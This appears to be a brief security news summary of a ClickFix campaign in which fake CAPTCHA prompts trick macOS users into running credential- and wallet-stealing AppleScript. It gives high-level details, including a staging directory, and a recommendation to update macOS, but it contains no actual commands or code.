A sophisticated ClickFix social engineering campaign is targeting macOS users by tricking them into executing malicious AppleScript commands that steal credentials, session cookies, and cryptocurrency wallet data.

Key Points

• Attackers use fake CAPTCHA prompts to trick users into pasting malicious curl commands into the macOS Spotlight search feature.
• The malware harvests data from 14 browsers, 16 standalone cryptocurrency wallets, and over 200 browser extensions.
• Stolen information includes Keychain passwords, session tokens, credit card numbers, and credentials for password managers like 1Password and LastPass.
• The script creates a temporary directory at /tmp/xdivcmp/ to stage stolen data before exfiltrating it to an attacker-controlled server.
• Newer versions of macOS, including Sequoia, now include security features designed to alert users when pasting potentially malicious commands into the system.

Why it Matters

This campaign highlights the persistent danger of social engineering tactics that bypass traditional software defenses by manipulating user behavior. Organizations and individuals should prioritize updating to the latest macOS versions to utilize built-in protections against these credential-harvesting scripts.